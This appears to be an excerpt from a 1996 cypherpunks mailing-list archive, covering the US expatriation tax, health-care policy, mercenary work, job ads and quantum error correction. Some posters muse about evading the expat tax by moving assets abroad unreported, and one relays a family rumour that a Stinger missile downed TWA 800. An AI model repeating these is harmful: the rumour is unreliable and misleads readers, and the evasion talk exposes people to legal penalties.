discusses only in personal appointments. Copyright 1996 by Marc M. Harris ----------------------------------------------------------------- Posted by Adam Starchild The Offshore Entrepreneur at http://www.au.com/offshore The privacy list is run automatically by the Majordomo list manager. Send a "help" command to majordomo at ftc.gov for assistance. From andrew_loewenstern at il.us.swissbank.com Tue Sep 17 19:01:17 1996 From: andrew_loewenstern at il.us.swissbank.com (Andrew Loewenstern) Date: Wed, 18 Sep 1996 10:01:17 +0800 Subject: "Get a fucking life" (was Re: Diffie Hellman - logs in Galois fields) In-Reply-To: <842988785.23058.0@fatmans.demon.co.uk> Message-ID: <9609172145.AA00585@ch1d157nwk> Paul Bradley (paul at fatmans.demon.co.uk) foams at the mouth: > Get a fucking life, seeing as you haven`t yet posted anything > relating remotely to the technical aspects of cryptography to > this list I think you need to take a long hard look at what > your saying loser.... Hey folks, when it is so obvious that someone is a looser that "Get a fucking life" flows so easily out of your keyboard, then there is no reason to post such missives publicly. Just plonk'em and forget'em ... those of us who have already done so don't want to read this dreck either. andrew From jbugden at smtplink.alis.ca Tue Sep 17 19:03:32 1996 From: jbugden at smtplink.alis.ca (jbugden at smtplink.alis.ca) Date: Wed, 18 Sep 1996 10:03:32 +0800 Subject: Risk v. Charity (was: RE: Workers Paradise. /Politica... Message-ID: <9608178430.AA843010044@smtplink.alis.ca> Black Unicorn wrote: >On Tue, 17 Sep 1996 jbugden at smtplink.alis.ca wrote: >> Black Unicorn >> >You are saying that everyone on the planet has a right to health >> > insurance and disability insurance whether they can afford it or not. >> > This is folly. The result is serious moral hazard problems. >> >> Almost, but not quite. I'm saying that within our two countries at least >> (Canada, U.S.) everyone could have access to medically necessary >> procedures because the *society as a whole* can afford it. > >The decisions about what is or is not medically necessary must by >design be made by government in a socialized medicine regime. People do make decisions that affect other people. If you feel safer in the good hands of Allstate than at the government trough, good for you. Personally, I trust in Allah, but I still tie up my camel. > This evades an important point as well. Namely, who cares if society > can afford it? Some things are seen as investments in the future of a society. I view both Education and Health through this lens. >> But there is a balance between accurately pricing the risk and >> minimizing the cost of the bureacracy that polices this pricing. > > Oh, I see. Let's give the program to the government then. Good idea. > That will reduce the cost of the bureacracy. The point is still valid. Are we not trying to minimize this cost? >> There are also many ways to modify behaviour, not all of them direct. > > And all of them buy into the notion that people are not to be made > personally responsible for their high risk behavior. There it is again. Blame the sick for their lack of moral fibre. Not every victim of lung cancer smokes. Besides, people are notoriously poor at evaluating the probability of unlikely events (see reference below). A "punishment" that happens 30 years after the "crime" is no deterrent. Prevention is usually cheaper than treatment. > I prefer market solutions. I prefer solutions. James From tcmay at got.net Tue Sep 17 19:32:42 1996 From: tcmay at got.net (Tim May) Date: Wed, 18 Sep 1996 10:32:42 +0800 Subject: The Expat Tax Is Law - The Door Is Now Closed! Message-ID: <199609171211.FAA02724@you.got.net> I'm forwarding this message to the list, as it relates to several themes we've been discussing recently. The imposition of draconian taxation policies effectively says that the U.S. is now doing what the Soviet Union did to emigrants: demand that they "pay back" various costs the government claimed they had incurred. Here, the U.S. is telling would-be expats that they cannot take their property with them, that they must effectively "escrow" (there's that horrid word again) their assets in a form and place that the tax collector can access, even if they no longer live in the United States and no longer use services, and even if they had paid their full taxes on income while they _were_ in the U.S. It makes me want to just put my stock certificates in my luggage and just drive on down to Mexico and cross the border (no border checks) and go from there to some safer haven. (However, I imagine the Feds can effectively block sales of my stock--the stock is still formally only an accounting entry, as stock certificates are not "bearer instruments." I could probably relocate to a foreign haven and sell the assets before the IRS would even notice...unless they computerize. I suspect this is coming.) Anyway, here's the article: > From: taxhaven at ix.netcom.com(Adam Starchild) > Newsgroups: alt.privacy > Subject: The Expat Tax Is Law - The Door Is Now Closed! > Date: 17 Sep 1996 01:30:43 GMT > Message-ID: <51kv03$d82 at dfw-ixnews5.ix.netcom.com> > > The Expat Tax Is Law - The Door Is Now Closed! > > by > > Marc M. Harris > > After last year's failed attempt to pass an American > expatriate tax, the U.S. Treasury Department succeeded in > sneaking the provisions into the miscellaneous revenue positions > of the recently passed Health Coverage Availability and > Affordability Act of 1996. Given the failure of their high > profile campaign last year, the Treasury Department switched > strategies this year and undertook one of stealth. While the > press was talking about tax-deductible contributions to medical > savings accounts (MSAs), provisions tightening the expatriation > tax rules were implemented. Foreign grantor trust rules were > also tightened under the law. > In order to provide the health insurance and care benefits > provided under the law, a separate tax title adds certain revenue > raising provisions. In general, these revenue offsets add > provisions aimed at making certain the United States get their > fair share plus some when U.S. citizens and permanent residents > expatriate. In short, Uncle Sam would like to tell its > expatriates that they earned their money from the United States, > not in it. > A review of selected sections of the Congressional Record > provides some additional insight into the thinking behind these > new provisions. > > "It has come to the attention of Congress that some > very wealthy individuals have been relinquishing their > citizenship to avoid U.S. income, estate and gift tax. The > bill does not want to discourage citizens from exercising > their right to expatriate, but does not want to provide a > tax incentive for such an action..." > > If Congress truly wanted to eliminate the incentive for > expatriation, it might be better to eliminate high taxation and > put an end to the litigation crisis rather than creating another > layer of government regulation and bureaucracy. > > "Congress believes the changes are consistent with > existing tax treaties in conferring a tax credit for taxes > paid in the foreign country, and to the extent they are > inconsistent, the Treasury Department will re-negotiate the > treaties to account for the changes. The new provisions > take precedence over any treaties..." > > To make certain that other countries will not benefit from > America's brain drain, the United States will once again embark > on a campaign to bully other nations into accepting America's > oppressive system of taxation and regulation. > > "This bill would subject former citizens to the > expatriation provisions with no inquiry into their motive > and requires individuals who exchange property that would > otherwise be exempt from U.S. taxation as foreign source > income must immediately recognize U.S. source income on any > gain from such a transaction. The Secretary is authorized > to issue regulations to treat removal of tangible property > from the U.S. and other conversions to foreign source > income. For example, any income from stock transferred to a > foreign source, such as dividends, would be converted to > U.S. source and immediately taxed..." > > Logic dictates that if this tax were to approach 100%, it > would look quite similar to currency controls and foreign > investment prohibitions. Since it only goes about half of the > way, we can assume that we are 50% down the road toward American > currency and foreign investment controls. > > "A new information reporting requirement has been added > requiring former citizens and long-term residents to > complete information reporting at the time of > expatriation..." > > Just to make certain that no one escapes from the United > States without leaving all their wealth behind, the new > information reporting requirements will make certain that the > Treasury Department always knows where your assets are placed. > Of course, if you fail to report, civil and criminal sanctions > will apply. The new treaty negotiations will most likely include > provisions to extradite those "expat tax evaders" back home for > their "criminal act" of leaving a country that was once known as > the home of the free. Our sources at the Internal Revenue > Service tell us this treaty provision will be known as the Hotel > California provision -- you can check out, buy you can never > leave. > > "The bill also requires that a U.S. person that > receives a distribution from a trust must report that to the > Service..." > > Now Uncle Sam is not only seeking to penalize those patriots > that have placed their funds out of harm's way, but now the > potential recipients of those receipts. If the logic of current > money laundering statutes apply as they do in most tax cases, the > bank that accepts the cashing of the beneficiary's distribution > check from a foreign trust will be a co-conspirator in this > "unpatriotic" affair. > > "Effective for transfers made after February 6, 1995, > if a non-resident alien becomes a resident within five years > of transferring property to a foreign trust, the transferor > will be considered to have transferred the property on the > date he became a resident..." > > The Statue of Liberty stands as America's great symbol of > open immigration with its famous inscription "give us your tired > and poor." With this provision, any person who hopes to emigrate > to the United States will definitely become tired of complying > with U.S. regulations and poor after he complies with them. > > "If a U.S. person receives more than $10,000 worth of > gifts from one foreign person during any tax year, he must > file a report with the Service. If he fails to file a > report, the Service has the sole discretion to determine the > taxation of the property received by the U.S. person and the > person is liable for a penalty of 5 percent of the value of > the gift for each month he fails to file a report..." > > Currency controls and foreign investment restrictions work > both ways. Not only will governments prevent you from sending > your money out, but they will also prevent you from sending your > money in without their fair share plus some. > > "The Service has the power to prescribe regulations to > prevent the avoidance of the Estate, Trust and Beneficiary > part of the Code..." > > This provision is known as an Abusive Transaction provision. > It is commonly referred to by international human rights > organizations as the arbitrary and capricious application of > laws. > > "Once the Secretary of the Treasury establishes a > reasonable belief that the expatriate's loss of U.S. > citizenship would result in a substantial reduction in > estate, inheritance, legacy, and succession taxes, the > burden of proving that one of the principal purposes of the > loss of U.S. citizenship was not avoidance of U.S. income or > estate tax is on the executor of the decedent's estate..." > > If these provisions were making you feel a bit suicidal, > please forget it. Uncle Sam is not only going to pursue you to > the grave, but also your executors and heirs. > > Other items in the Congressional Record provide an even > greater insight into Washington's motivations: > > "Because U.S. citizens who retain their citizenship are > subject to income tax on accrued appreciation when they > dispose of their assets, as well as estate tax on the full > value of assets that are held until death, the Committee > believes it fair and equitable to tax expatriates on the > appreciation in their assets when they relinquish their U.S. > citizenship. The Committee believes that an exception from > the expatriation tax should be provided for individuals > whose income and net worth are relatively modest..." > > If you are poor, you may leave; however, if you were a > productive American in the United States that no longer exists, > you must stay and pay or leave behind the fruits of your > productivity. America's Second Civil War has begun and it is > known as Class Warfare. > > "Exceptions from the expatriation tax are provided for > individuals. (An) exception applies to a U.S. citizen who > relinquishes citizenship before reaching age 18-1/2, > provided that the individual was a resident of the United > States for no more than 5 taxable years before such > relinquishment..." > > Since one cannot renounce their American citizenship prior > to their 18th birthday, the children of an American resident > overseas have only 6 months to renounce their citizenship and > avoid the application of these laws. Ho many 18 year olds are > capable of making this type of decision? > > "Under the provision, an individual is permitted to > elect to defer payment of the expatriation tax with respect > to the deemed sale of any property. Under this election, > the expatriation tax with respect to a particular property, > plus interest thereon, is due when the property is > subsequently disposed of. In order to elect deferral of the > expatriation tax, the individual is required to provide > adequate security to ensure that the deferred expatriation > tax and interest ultimately will be paid... In the event > that the security provided with respect to a particular > property subsequently becomes inadequate and the individual > fails to correct such situation, the deferred expatriation > tax and interest with respect to such property becomes due. > As a further condition to making this election, the > individual is required to consent to the waiver of any > treaty rights that would preclude the collection of the > expatriation tax." > > Only in Congress could one dream of a law that requires its > former citizens to waive their rights in a foreign country in > order to escape from the political, social, and economic tyranny > of the United States. > > "Under the provision, special rules apply to trust > interests held by the individual at the time of > relinquishment of citizenship or termination of residency. > In addition, an individual who holds (or who is treated as > holding) a trust interest at the time of relinquishment of > citizenship or termination of residency is required to > disclose on his or her tax return the methodology used to > determine his or her interest in the trust, and whether such > individual knows (or has reason to know) that any other > beneficiary of the trust uses a different method..." > > The latter provision is known as the "Stool Pigeon" clause - > - you are required to turn your fellow beneficiaries over to the > Internal Revenue Service. Similar laws existed in Nazi Germany > that encouraged children to turn their parents and neighbors over > to the authorities. > > "If the individual holds an interest in a trust that is > not a qualified trust, a special rule applies for purposes > of determining the amount of the expatriation tax due with > respect to such trust interest. Such separate trust is > treated as having sold its assets as of the date of > relinquishment or citizenship or termination of residency > and having distributed all proceeds to the individual, and > the individual is treated as having recontributed such > proceeds to the trust. The individual is subject to the > expatriation tax with respect to any net income or gain > arising from the deemed distribution from the trust. A > beneficiary's interest in a non-qualified trust is the basis > of all facts and circumstances. If the individual has an > interest in a qualified trust, a different set of rules > applies. In determining this amount, all contingent and > discretionary interests are resolved in the individual's > favor (i.e. the individual is allocated the maximum amount > that he or she potentially could receive under the terms of > the trust instrument)..." > > The United States is quite generous in calculating the tax > based on the maximum possible distribution. In their arrogance, > it appears that the law does not detail how to recover the excess > tax if the maximum level is never reached. Alternatively, > Congress never intended for former Americans to comply with this > law. > > "If the individual does not agree to such a waiver of > treaty rights, the tax with respect to distributions to the > individual is imposed on the trust, the trustee is > personally liable therefor, and any other beneficiary of the > trust will have a right of contribution against such > individual with respect to such tax." > > Based on the above, no foreign financial institution with > offices or business in the United States would accept the > trusteeship of an American's assets. > > "Under the provision, an individual is permitted to > make an irrevocable election to continue to be taxed as a > U.S. citizen with respect to all property that otherwise is > covered by the expatriation tax. This election is an "all- > or-nothing" election;..." > > Congress is quite generous with this provision in allowing > expatriating Americans to continue being chased by tax collectors > for the rest of their lives overseas. > > "Under the provision, an individual is treated as > having relinquished U.S. citizenship on the date that the > individual first makes known to a U.S. government or > consular officer his or her intention to relinquish U.S. > citizenship... A U.S. citizen who furnishes to the State > Department a signed statement of voluntary relinquishment of > U.S. nationality, confirming the performance of an > expatriating act with the requisite intent to relinquish his > or her citizenship is treated as having relinquished his or > her citizenship on the date the statement is so furnished > (regardless of when the expatriating act was performed), > provided that the voluntary relinquishment is later > confirmed by the issuance of a CLN (Certificate of Loss of > Nationality). If neither of these circumstances exist, the > individual is treated as having relinquished citizenship on > the date a CLN is issued or a certificate of naturalization > is cancelled. The date of relinquishment of citizenship > determined under the provision applies for all tax > purposes..." > > Based on this provision, almost any American who now wishes > to undertake the expatriation route will be subject to the tax. > In short, the door has closed for most Americans. > > "Under the provision, the exclusion from income does > not apply to the value of any property received by gift or > inheritance from an individual who was subject to the > expatriation tax. Accordingly, a U.S. taxpayer who receives > a gift or inheritance from such an individual is required to > include the value of such gift or inheritance in gross > income and is subject to U.S. income tax on such amount..." > > This implies that if an American expatriate sends funds back > to support his aging parents, his parents will need to treat > these gifts as taxable income. If the parents fail to report > these amounts, they could also suffer civil and criminal > penalties associated with tax evasion. > > "Under the provision, an individual who relinquishes > citizenship or terminates residency is required to provide a > statement which includes the individual's social security > number, forwarding foreign address, new country of residence > and citizenship and, in the case of individuals with a net > worth of at least $500,000, a balance sheet..." > > Given the desire to obtain balance sheets from expatriating > Americans, it is only a matter of time before the IRS requires > the inclusion of personal balance sheets of individual taxpayers > with their Form 1040s or at least those they suspect might wish > to expatriate. > > "In the case of a former citizen, such statement is due > not later than the date the individual's citizenship is > treated as relinquished and is provided to the State > Department..." > > In short, this means that you cannot obtain your certificate > of loss of nationality without providing the information to the > United States government. > > "Further, the provision requires the Secretary of the > Treasury to publish in the Federal Register the names of all > former U.S. citizens with respect to whom it receives the > required statements or whose names it receives under the > foregoing information-sharing provisions..." > > Now your friends and neighbors can know that you have > expatriated. Although Congress respects the right of Americans > to expatriate, it will publish your name in the federal register > as if expatriation were a criminal act. > > "The provision directs the Treasury Department to > undertake a study on the tax compliance of U.S. citizens and > green-card holders residing outside the United States and to > make recommendations regarding the improvement of such > compliance. The findings of such study and such > recommendations are required to be reported to the House > Committee on Ways and Means and the Senate Committee on > Finance within 90 days of the date of enactment..." > > Uncle Sam has awoken to the fact that most Americans living > overseas are the most likely individuals to expatriate and as a > result, they are gearing up to create a machine to attack them as > well. > > The provision is effective for U.S. citizens whose date > of relinquishment of citizenship (as determined under the > provision occurred on or after February 6, 1995. U.S. > citizens who committed an expatriating act with the > requisite intent to relinquish their U.S. citizenship prior > to February 6, 1995, but whose date of relinquishment of > citizenship (as determined under the provision) does not > occur until after such date, are subject to the expatriation > tax..." > > This means that if you have not already relinquished your > citizenship or have only done so recently, you are subject to the > expat tax. The door has closed, but not completely. > > About the Author > > Marc M. Harris is a certified public accountant and > president of The Harris Organization. He has already developed a > strategy for legally avoiding the expat tax, which he discusses > only in personal appointments. > > Copyright 1996 by Marc M. Harris > > ----------------------------------------------------------------- > > Posted by Adam Starchild > The Offshore Entrepreneur at http://www.au.com/offshore -- Boycott "Big Brother Inside" software! We got computers, we're tapping phone lines, we know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Licensed Ontologist | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From keys at starnine.com Tue Sep 17 20:02:40 1996 From: keys at starnine.com (StarNine Eval Key Service) Date: Wed, 18 Sep 1996 11:02:40 +0800 Subject: ListSTAR/SMTP Message-ID: Here is your authorization serial number for ListSTAR/SMTP. Remember, only one evaluation serial number is allowed per customer. If you require additional authorization serial numbers please contact our Sales Department. If you have any problems with the software, please contact our support staff (support at starnine.com). When you are ready to purchase ListSTAR/SMTP, you may do so by contacting our Sales Department by phone at 1-800-525-2580, or by sending email to sales at starnine.com. You may also order some products Online at Thank you for evaluating ListSTAR/SMTP! sales at starnine.com (510) 649-4949 This key will expire in 30 days. Key is for: ListSTAR/SMTP Demo Key Serial Number: L*SM-386u-q9qE-%t4y-yptE Key Support ID: 6-1399-KHQ Key Duration: 47 Day(s) Beginning: Sun, Sep 1, 1996 Expiring: Fri, Oct 18, 1996 Number of users/Options: 0 -------------------- Original Message Follows -------------------- Request for Eval Serial Number From printing at explicit.com Tue Sep 17 20:15:24 1996 From: printing at explicit.com (William Knowles) Date: Wed, 18 Sep 1996 11:15:24 +0800 Subject: Assassination Politics, was Kiddie porn on the Internet In-Reply-To: <2.2.32.19960917161601.002ee52c@strange.qualcomm.com> Message-ID: On Tue, 17 Sep 1996, Michelle Thompson wrote: > Interesting information from a friend of mine- > > >An american can not serve for pay for a position in another military > >that could be filled by local populace. I may have my jurisdiction > >wrong tho, this could be an international law not a US law. > >Basically, you can't go be a grunt or an assasin in another country, > >because they can find their own, What about the French Foreign Legion? or the Volunteers for Israel, which isn't really a fighting force, but Americans can help keep the Israeli army at a ready state. > I believe that with the breakdown of the traditional sense of sovereignty, > mercenary activity, whether military or commercial in nature, will increase. > Engineering seems to be quite mercenary already, and very international. > Marketing and advertising, to a novice (me), seem to be going the same way. Depends on what you would qualify as being mercenary work, Would Americans working on North Sea oil platforms getting paid $70,000+ a year tax free be considered a mercenary? Or going down to the islands and opening a data haven? Or maybe being the engineer for the Sultan of Brunei? Marketing and advertising has always been mercenary work for as long as I have been in it, Ask any number of freelancers who have been slogging it out in the trenches. William Knowles President Graphically Explicit Advertising Hired Gun Since 1992! -- Graphically Explicit Advertising PGP mail welcome & prefered / KeyID 1024/415D7FF9 PGP Fingerprint D3 45 A4 38 73 99 77 4A 98 BB A2 81 97 68 73 03 -- Explicit isn't a dirty word, Or is it? From pstira at escape.com Tue Sep 17 21:06:14 1996 From: pstira at escape.com (pstira at escape.com) Date: Wed, 18 Sep 1996 12:06:14 +0800 Subject: Getting the word "GAK" into common usage In-Reply-To: <199609121522.LAA106562@osceola.gate.net> Message-ID: On Thu, 12 Sep 1996, Jim Ray wrote: > As most of you know, I have been trying to bring "our" word, "GAK" into > common usage, as opposed to the "key-escrow" Newspeak proposed by some > (unnamed) big-government bureaucrat, and unfortunately adopted in most > discussions of cryptography policy, (especially those outside this forum) > in spite of the true English meaning of the word "escrow." I OPPOSE THIS LIBELOUS SLANDEROUS PSHAW PSHAW GACK GAK GAKATTACK. With all due respekt, Herr Captain, I have useth the term GAKeth for many a spritely years and NOONE gives ME any mention. NOONE CARES. I feel unloved. And, oh GAK, I feel OLDER. hmph. -Millie. (upon the birthday of last week, I hereby reserve the right to be a bitch ONCE, JUST ONCE) From tcmay at got.net Tue Sep 17 21:06:22 1996 From: tcmay at got.net (Timothy C. May) Date: Wed, 18 Sep 1996 12:06:22 +0800 Subject: The Expat Tax Is Law - The Door Is Now Closed! Message-ID: At 11:20 PM 9/17/96, Duncan Frissell wrote: >At 05:11 AM 9/17/96 -0700, Tim May wrote: > >>It makes me want to just put my stock certificates in my luggage and just >>drive on down to Mexico and cross the border (no border checks) and go >>from there to some safer haven. >> >>(However, I imagine the Feds can effectively block sales of my stock--the >>stock is still formally only an accounting entry, as stock certificates >>are not "bearer instruments." I could probably relocate to a foreign haven >>and sell the assets before the IRS would even notice...unless they >>computerize. I suspect this is coming.) > >But since a 10-year old (who is willing to break the law) can defeat their >expat tax, what difference does it make. All one has to do is cash out, >transfer all funds overseas, follow them, and renounce. Move the funds >around a little. It's not tax fraud (no false documents have been uttered >-- indeed no documents at all). Just take your marbles and go home. While I've always admired your "in-your-face" approach to tax matters, I remain skeptical. What I expect will happen is some variant of "witholding" to be implemented, where one's "transfer agent" (the holder of one's actual stock, regardless of who holds the paper certificates) releases only, say, 60% of the proceeds from a sale and holds the remaining 40% for eventual settlement of taxes. (Much as one's employer "witholds" a percentage, ranging up to 50% or so, for Federal, State, and FICA taxes.) --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From pstira at escape.com Tue Sep 17 21:27:22 1996 From: pstira at escape.com (pstira at escape.com) Date: Wed, 18 Sep 1996 12:27:22 +0800 Subject: XPA_nix In-Reply-To: <199609121743.RAA13735@pipe3.t1.usa.pipeline.com> Message-ID: On Thu, 12 Sep 1996, John Young wrote: > Cheswick opines,"This is the first major attack of a kind that I believe to > be the final Internet security problem." Harrumph. We should only BE so lucky. BAD internet. BAD. -Millie. (nope, it wasn't me, bah) sfuze at tiac.net From tcmay at got.net Tue Sep 17 21:47:36 1996 From: tcmay at got.net (Timothy C. May) Date: Wed, 18 Sep 1996 12:47:36 +0800 Subject: Anthrax on the 'net [Was Re: Fear of Flying -- from HotWired ] Message-ID: At 9:14 PM 9/17/96, Mike Fletcher wrote: > The Frank Herbert (of _Dune_ fame) book _White Plague_ comes >to mind. Basically a molecluar biologist's wife and kids are killed >by an IRA bomb while visiting Dublin. He snaps and creates a plague >which kills women (men are carriers) as revenge. All without using >that nasty Internet (in fact, the book was written back before even >ARPAnet). A _very_ minor correction. My copy of "The White Plague" is not handy, but I distinctly recall reading it circa 1980-1, certainly no earlier than 1977-8. The ARPANet was going strong by then. Newsgroups were getting started around 1980, give or take, as I recall. But of course I agree that "The White Plague" was written long before "The Net" became a household name. (Interestingly, Herbert was computer-literate, and he even wrote a book about using PCs, circa the late 70s....something like "Nailing Jelly to a Tree.") --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From pstira at escape.com Tue Sep 17 21:57:20 1996 From: pstira at escape.com (pstira at escape.com) Date: Wed, 18 Sep 1996 12:57:20 +0800 Subject: All Bets Off In-Reply-To: Message-ID: A bit worried, now, Brock? Not like we'd have access. I smell a new era / area 51. Smells like lemons. (ie -- it sucks) -Millie, who is not even premenstrual. :) On Mon, 16 Sep 1996, Brock N. Meeks wrote: > > Just so this isn't hanging in cyberspace forever, my $5,000 bet for > anyone to prove the TWA 800 flight was downed by a U.S. missile is now > *off the table*. > > > It's been two-plus weeks since I tossed out the bet and no one took me up > on it, so it's now being formally withdrawn. > > --Brock > > From pstira at escape.com Tue Sep 17 21:59:12 1996 From: pstira at escape.com (pstira at escape.com) Date: Wed, 18 Sep 1996 12:59:12 +0800 Subject: "But if it saves just one child." In-Reply-To: <199609160656.AAA23532@InfoWest.COM> Message-ID: On Mon, 16 Sep 1996, attila wrote: > = .The rallying cry heard so often these days: "But if it saves just one child." > = . ACCKKKKKIK. SYN ACK GAK BLAH. Read some Ayn Rand. This must end. IOW: I call bullshit. I call total bullshit. The net, fomerly my oasis, needs death. (To all of those joyous government individuals who may have written my name down, now, in unbridled glee, please make sure to spell it correctly, dot the i's, and have a really groovy day). Sovreignly, Millie From steve at tsearch.com Tue Sep 17 22:02:01 1996 From: steve at tsearch.com (Steve Dyson) Date: Wed, 18 Sep 1996 13:02:01 +0800 Subject: Systems/Communications Security Positions in the South Bay Message-ID: I know someone is going to get PO'd about this, but I didn't know how else to get these in front of you in a timely manner. These positions are critical and interesting parties can interview next week, please read on: --------------- One of the Nation's leaders in Systems and Communications security is seeking several talented engineers to join their South Bay Development/Consulting facility to develop Internet/WWW Commerce Software. As a Software Developer on this project you will be responsible for the development of Electronic Commerce Software that spans the World Wide Web, e-mail, distributed applications, security, cryptography, O/S security, and Internet protocols. Qualified candidates should be experienced system software developers with three years development experience including several of the following areas: Unix, NT, TCP/IP, network protocol development, distributed application development, applied cryptography. For more information on this and other opportunities send a resume/email to steve at tsearch.com -------------------------- 2. One of the Nation's leaders in Systems and Communications security is seeking several talented engineers to join their South Bay Development/Consulting facility to develop Distributed, CORBA-compliant Software. As a Software Developer on this team you will join a new project spanning distributed object applications, CORBA ORB services, CORBA security, O/S security, a network protocol development. An existing high security O/S's distributed system capabilities are being extended to provide object request brokerage. New security components for access-controled inter-ORB interoperability are being developed. New and existing security mechanisms are being integrated for these components. This position requires strong system software development experience with at at least three years development experience including several of the following areas: CORBA, Unix, firewalls, TCP/IP, network protocol development, object-oriented software development, distributed application development, Mach, Kerberos, DCE, trusted systems, multi-level security. For more information on this and other opportunities send a resume/email to steve at tsearch.com -------------------- 3. One of the Nation's leaders in Systems and Communications security is seeking several talented engineers to join their South Bay Development/Consulting facility as Network Security Consultants. There are 4 positions requiring 2-4, 4-6 (2), and 6+ years of experience respectively. As a Network Security Consultant you will: - discuss network configuration and hacker threats with system administrators - understand issues related to network security policies and procedures - identify effective approaches to security issues of multi-platform systems, corporate LANs, and Internet systems - identify, understand, and effectively communicate risks, and tradeoffs between security requirements and user productivity and system performance - provide input for training materials that address customers' specific policies, network configuration, and risks - operate independently to perform customer relations and project management for some projects, including primary responsibility for written deliverables - provide oversight for a number of projects managed by others, - perform business development and expand customer base, with assistance from junior colleagues. These positions require strong system software development experience with UNIX and NT platforms, as well as some of the following: network protocols, firewalls, network security vulnerabilities, applied cryptography, access control, risk assessment, security policies. For more information send a resume/email to steve at tsearch.com ]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]] Steve Dyson Technology Search International Consultant 25 Metro Drive, STE 238 steve at tsearch.com San Jose, CA 95110 VOICE 408.437.9500 FAX 408.437.1033 "...dockin-doid, dockin-doid.........dockin- doid" ]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]] From eagle at armory.com Tue Sep 17 22:03:37 1996 From: eagle at armory.com (Jeff Davis) Date: Wed, 18 Sep 1996 13:03:37 +0800 Subject: All Bets Off In-Reply-To: Message-ID: <9609171918.aa03723@deepthought.armory.com> > Just so this isn't hanging in cyberspace forever, my $5,000 bet for > anyone to prove the TWA 800 flight was downed by a U.S. missile is now > *off the table*. I heard through the family grapevine that they have pictures of a Stinger taking out the plane they're analyzing in the Pentagon. There are 220+ Stingers *missing* in the US, so its not like they have to smuggle them in... (That's not proof by any means, but *my* family grapevine has always been very reliable. The cousin who told me this has a Dad who flew as the intelligence officer observer on Bronco flights out of Quang Tri for 18 months, rotating out just before the base was over run in May of '72.) -- According to John Perry Barlow: *What is EFF?* "Jeff Davis is a truly gifted trouble-maker." *email * *** O U T L A W S On The E L E C T R O N I C F R O N T I E R **** US Out Of Cyberspace!!! Join EFF Today! *email * From krenn at nym.alias.net Tue Sep 17 22:10:29 1996 From: krenn at nym.alias.net (Krenn) Date: Wed, 18 Sep 1996 13:10:29 +0800 Subject: Snake-Oil FAQ Message-ID: <199609180001.UAA24489@anon.lcs.mit.edu> -----BEGIN PGP SIGNED MESSAGE----- It would be nice to have a list of actual products which are deemed potential snake-oil. Such a list could be maintained anonymously through a nym to avoid all the annoying legal problems with commenting on another's product. Though truth is the best defense against libel charges, it would be very annoying to be sued or some such by some hairbrained snake-oil peddler. Krenn -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMj84gEnqfwPpt/QVAQEWZAP9EZ7+3dQol+ZBLYQIiEk8f8avKDje5LBh EmE5GVxFXDgD9wAmcccMMuVxxCaUhN0kc8Q4StQ4aZGjwdrCGouHq4aNJdd73ERP vuk+VpQrlUwSvwwPlfXKUIQrM1PHfNigXrS5OrsQe/H/GjLw2lFa/WI2urR2Cuqg oMmtuQKrJik= =r2wq -----END PGP SIGNATURE----- From johnkc at well.com Tue Sep 17 22:11:49 1996 From: johnkc at well.com (John K Clark) Date: Wed, 18 Sep 1996 13:11:49 +0800 Subject: Quantum Computers Message-ID: <199609180209.TAA16547@well.com> -----BEGIN PGP SIGNED MESSAGE----- In the April 12 1996 issue of Science there is an article on Quantum Computers. It makes clear that a practical Quantum Computer has not been proven to be possible, nevertheless the article had a very optimistic tone, an optimism I did not see just one year ago. If such a machine could be built the ramifications are mind boggling. When a conventional 64 bit single processor computer performs an operation, it does it on ONE 64 bit number at a time. When a 64 bit (actually a 64 qubit) single processor QUANTUM computer performs an operation it does it on ALL 64 bit numbers at the same time, all 2^64 of them, more than a billion billion, and any increase in the number of qubits the computer can handle will increase it's already astronomical power exponentially. It gets even wilder, because the quantum mechanical state of the matter in the machine's memory determines the output, Seth Lloyd of MIT thinks you could run the machine in reverse and the result would be a quantum mechanical micromanipulator. Despite this enormous increase in performance and a possible short cut to Nanotechnology, most weren't very interested because it didn't seem like a Quantum Computer could ever be built. The slightest error or interaction with the outside environment would render the machine inoperative, conventional error correcting codes don't work for in the quantum domain and most said that correcting codes for quantum mechanical information was impossible. They were wrong. Late last year Peter Shor of ATT showed how to encode a piece of quantum information in a 9 qubit system so that the information is retained even if there is an error in one of the 9 qubits. A few months later researchers at IBM refined Shor's technique so that only 5 qubits was needed, and found ways to correct for multiple errors. The trouble was, although Shor's idea worked well for storing and transmitting quantum information without error, it did not work for the actual calculation, many thought that surely was impossible. It turns out they were wrong about that too. In the August 30 1996 issue of Science is an article by J. I. Cira, T. Pellizzari, and P. Zoller entitled "Enforcing Coherent Evolution In Dissipative Quantum Dynamics". They propose a Quantum error correcting scheme with modest computational overhead that would dramatically increase the number of quantum logic gates the machine could have before errors made it unreliable. If p is probability that a single gate will fail, then without error correction a Quantum Computer can only have 1/p gates as a practical matter. With this new quantum error correcting code it can have 4/p^2 gates before errors overwhelm it. For example, if the probability that one gate will fail is .09 then if you have no error correction your Quantum Computer better not have more that 11 logic gates, with this new error correcting idea it could have 494 logic gates without making more errors than the 11 did. Until very recently the only useful program known to be able to run on these machines was one to factor large numbers for code breaking. Unfortunately there are problems, to factor a 100 digit number the machine would need to perform millions of quantum logical operations 